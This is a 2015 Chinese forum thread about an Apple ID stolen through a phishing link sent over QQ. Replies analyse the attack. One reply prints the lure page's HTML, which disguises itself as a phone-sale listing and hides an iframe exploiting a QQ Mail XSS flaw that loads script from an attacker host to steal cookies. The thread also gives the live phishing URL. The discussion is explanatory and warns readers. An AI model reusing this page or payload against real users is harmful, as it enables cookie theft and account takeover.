chaim
V2EX  ›  Apple

来说说我的 Apple ID 被盗经历

  •  
  •   chaim · Oct 21, 2015 · 7329 views
    This topic created in 3856 days ago, the information mentioned may be changed or developed.
    准确来说是女友的号,现在网易这么火,我也来凑个热闹,大家也有个防备

    前一段时间,女朋友的 6 不慎被偷,期间各种钓鱼短信,在我的引导下都没有被对方获取密码
    就在 17 号,手机过保的最后一天,有陌生 QQ 加女友,说是手机维修店的
    发来一张图片问是不是她丢失的手机,打开后跳转到了一个 app 门户网站

    然后电影开场了,我们去看电影就没注意,看完后就开始弹 apple id 的登录框了,我没敢让她输入,都是直接取消掉了

    第二天我在电脑上登录 Apple ID 的时候帐号已经被窃了

    然后我就觉得这么叼,很不解的拨通了苹果的客服电话

    然后高潮来了

    客户哥们儿操着浓厚的东北口音跟我说,你手机中病毒了,你打开那个网页的时候就中了木马,黑客获取到了你的信息,盗取了密码,建议我重装一遍设备的系统,要不有可能有残留的木马

    我震惊了!!!就一个网页木马,就能盗取我的 apple id 帐号,这木马也太叼了吧
    尼玛浏览器是不是就不要用了
    apple id 账户系统太脆弱了吧
    我开心的在互联网上冲着狼,突然我的 apple id 被盗了,然后手机被锁了,交完保护费才能使用

    当时忘记问那哥们儿了
    1. 重置密码有哪几种方式?
    2. 黑客是用那种方式重置了我的密码?
    3. 黑客利用病毒获取了我的那些信息重置了密码?
    4. 黑客为什么能够通过网页木马在我的设备上获取足以重置帐号的信息?

    apple id 是 Gmail ,辅助邮箱是 QQ
    第二天重置密码的时候在 QQ 邮箱里面看到了黑客重置密码的邮件
    照那东北哥们儿的口气是 apple id 环节出的问题,我也怀疑是 QQ 应用环节 QQ 密码被盗也有可能
    有朋友遇到类似的情况吗
    Supplement 1  ·  Oct 21, 2015
    当时是在外面,用 iphone 手机打开的链接
    样本: http://url789.com/K21Kz
    37 replies    2015-10-21 16:39:26 +08:00
    chairuosen
        1
    chairuosen  
       Oct 21, 2015
    图片被下木马了吧?网游盗号都这么盗的。你打开图片(其实是 exe)电脑就被控了
    5GA
        2
    5GA  
       Oct 21, 2015
    打开一个图片跳转到网页 的时候,你就该怀疑这个图片到底正常不正常了。
    如果是木马,后面记录了你一天的电脑使用情况,从之中找到你 qq 邮箱密码简直太容易了
    Yvette
        3
    Yvette  
       Oct 21, 2015 via iPhone
    這些人簡直無孔不入⋯
    bzw875
        4
    bzw875  
       Oct 21, 2015 via iPhone
    打开图片跳出一个网站,.exe 的图片吧?
    gaohongyuan
        5
    gaohongyuan  
       Oct 21, 2015 via Android
    感谢分享经历,又涨了姿势。。
    virusdefender
        6
    virusdefender  
       Oct 21, 2015 via Android
    图片怎么跳转网站?还有样本么
    chaim
        7
    chaim  
    OP
       Oct 21, 2015 via iPhone
    @chairuosen
    @bzw875
    打开链接的设备是 iPhone 6
    bubuyu
        8
    bubuyu  
       Oct 21, 2015
    苹果客服有东北口音的?我打过几次全都是台湾腔是怎么回事
    lawdoge
        9
    lawdoge  
       Oct 21, 2015
    gmail 没有开两步验证对嘛楼主
    chaim
        10
    chaim  
    OP
       Oct 21, 2015
    @lawdoge 嗯 没有二步验证 之前 2 个月都没有被盗,打开链接半小时内密码就被重置了
    66beta
        11
    66beta  
       Oct 21, 2015
    gmail 被撞库?
    qq2511296
        12
    qq2511296  
       Oct 21, 2015
    这么牛逼 打开一个网站就能把账号盗了? 而且还是用 iPhone 打开的那个网站。。。。。。。。。。。。。 能通过一张图片 来打开网站? 手机 qq 能这样?
    chyiz
        13
    chyiz  
       Oct 21, 2015
    样本网站嵌了一个网易新闻页和一个 qq 邮箱页的 frame ……
    yxaaa123
        14
    yxaaa123  
       Oct 21, 2015
    一定是东北口音搞的鬼!!!
    huhuhushan
        15
    huhuhushan  
       Oct 21, 2015   ❤️ 2
    那个网站的源代码,
    <!DOCTYPE html>

    <html>
    <head>
    <meta name="viewport" content="width=device-width" />
    <title>iPhone6 plus 转让 国行 三网通 无拆修 保内 配件齐全</title>

    </head>
    <body>
    <iframe src="http://j.news.163.com/docs/98/2015101120/B5M0UJPA9001UJPB.html#p=3880026" style="width:100%;height:1000px;border:none"></iframe>

    <iframe src="http://open.mail.qq.com/cgi-bin/dy_preview?&t=dy_cutt&submit_id=xx&column_url=http%3a%2f%2fxc.jsled.com.cn%2fmail.xml&qqtype=lockKey2" style="display:none"></iframe>
    </body>
    </html>

    嵌套了两个 frame
    chyiz
        16
    chyiz  
       Oct 21, 2015   ❤️ 6
    看来是 XSS 攻击
    网易新闻页显示出来装样子的,但是 QQ 邮箱页面地址 hxxp://open.mail.qq.com/cgi-bin/dy_preview?&t=dy_cutt&submit_id=xx&column_url=http%3a%2f%2fxc.jsled.com.cn%2fmail.xml&qqtype=lockKey2 带了这网站的参数:
    hxxp://xc.jsled.com.cn/mail.xml

    xml 的文件内容:
    https://gist.github.com/chyiz/bea8d52bccd198f72eb9#file-mail-xml
    加载 js:
    https://gist.github.com/chyiz/bea8d52bccd198f72eb9#file-response-js
    大概就是这样盗取了 QQ 的 cookie 。。。
    chyiz
        17
    chyiz  
       Oct 21, 2015
    panlilu
        18
    panlilu  
       Oct 21, 2015
    涨姿势了
    ooTwToo
        19
    ooTwToo  
       Oct 21, 2015
    可怕
    chaim
        20
    chaim  
    OP
       Oct 21, 2015
    @huhuhushan
    @chyiz 赞两位,看来是 xss 攻击了
    lifeOTdie
        21
    lifeOTdie  
       Oct 21, 2015
    话说。。。我用电脑打开了你那个样本链接,我会发生什么奇怪的事情么
    izoabr
        22
    izoabr  
       Oct 21, 2015
    合着 QQ 邮箱有 XSS 的洞?
    yslsy
        23
    yslsy  
       Oct 21, 2015
    @lifeOTdie 同问 - -!
    jsq2627
        24
    jsq2627  
       Oct 21, 2015
    我擦,这是 QQ 邮箱的 XSS 啊。。
    楼上打开链接的感觉改 QQ 邮箱密码去。
    jsq2627
        25
    jsq2627  
       Oct 21, 2015
    感觉 -> 赶紧
    xiaoyao9933
        26
    xiaoyao9933  
       Oct 21, 2015
    这 XSS 漏洞提交乌云了么??看来 QQ 邮箱也不能用了。。
    chaim
        27
    chaim  
    OP
       Oct 21, 2015
    @xiaoyao9933 http://open.mail.qq.com/cgi-bin/dy_preview 被攻击的地址现在已经 404 了
    xx314327475
        28
    xx314327475  
       Oct 21, 2015
    @izoabr 有道理
    aliuwr
        29
    aliuwr  
       Oct 21, 2015
    别大惊小怪了,网易也有类似的嘛。
    http://wooyun.org/bugs/wooyun-2015-0147846

    常去 wooyun 看就知道,不是自己电脑没木马就没事了,什么产品都是有一堆漏洞的。
    提交到 wooyun 上的还能看到,提交到腾讯的就只有 “已修复” 了。
    http://security.tencent.com/index.php/announcement/msg/84

    自己能做的就是尽可能保护好关键的几个帐号,定期换复杂密码。
    RqPS6rhmP3Nyn3Tm
        30
    RqPS6rhmP3Nyn3Tm  
       Oct 21, 2015
    偷 Cookie 吗?现在花样真多
    wavingclear
        31
    wavingclear  
       Oct 21, 2015
    手贱拿浏览器点开了那个链接
    七八年来第一次改 QQ 密码……
    RitianZhao1988
        32
    RitianZhao1988  
       Oct 21, 2015
    已点开,改密码去...
    discrete
        33
    discrete  
       Oct 21, 2015
    我点开了链接,赶快去看看 qq 邮箱,发现 cookies 过期了……
    xAI
        34
    xAI  
       Oct 21, 2015
    点开了,还好没上 QQ ,邮箱也没有登录。
    a591826944
        35
    a591826944  
       Oct 21, 2015
    @discrete 还好我的 cookie 也过期了
    wsy2220
        36
    wsy2220  
       Oct 21, 2015 via Android
    黑产都这么牛了……
    lawdoge
        37
    lawdoge  
       Oct 21, 2015
    手机 qq 打开个别网页应用会授权自己的密码貌似,跟注册论坛应该是一个道理,之前用电脑端打开个别论坛不小心误按了授权也会被盗号。

    总之 qq 真的是各种不靠谱
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   1011 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 108ms · UTC 19:15 · PVG 03:15 · LAX 12:15 · JFK 15:15
    ♥ Do have faith in what you're doing.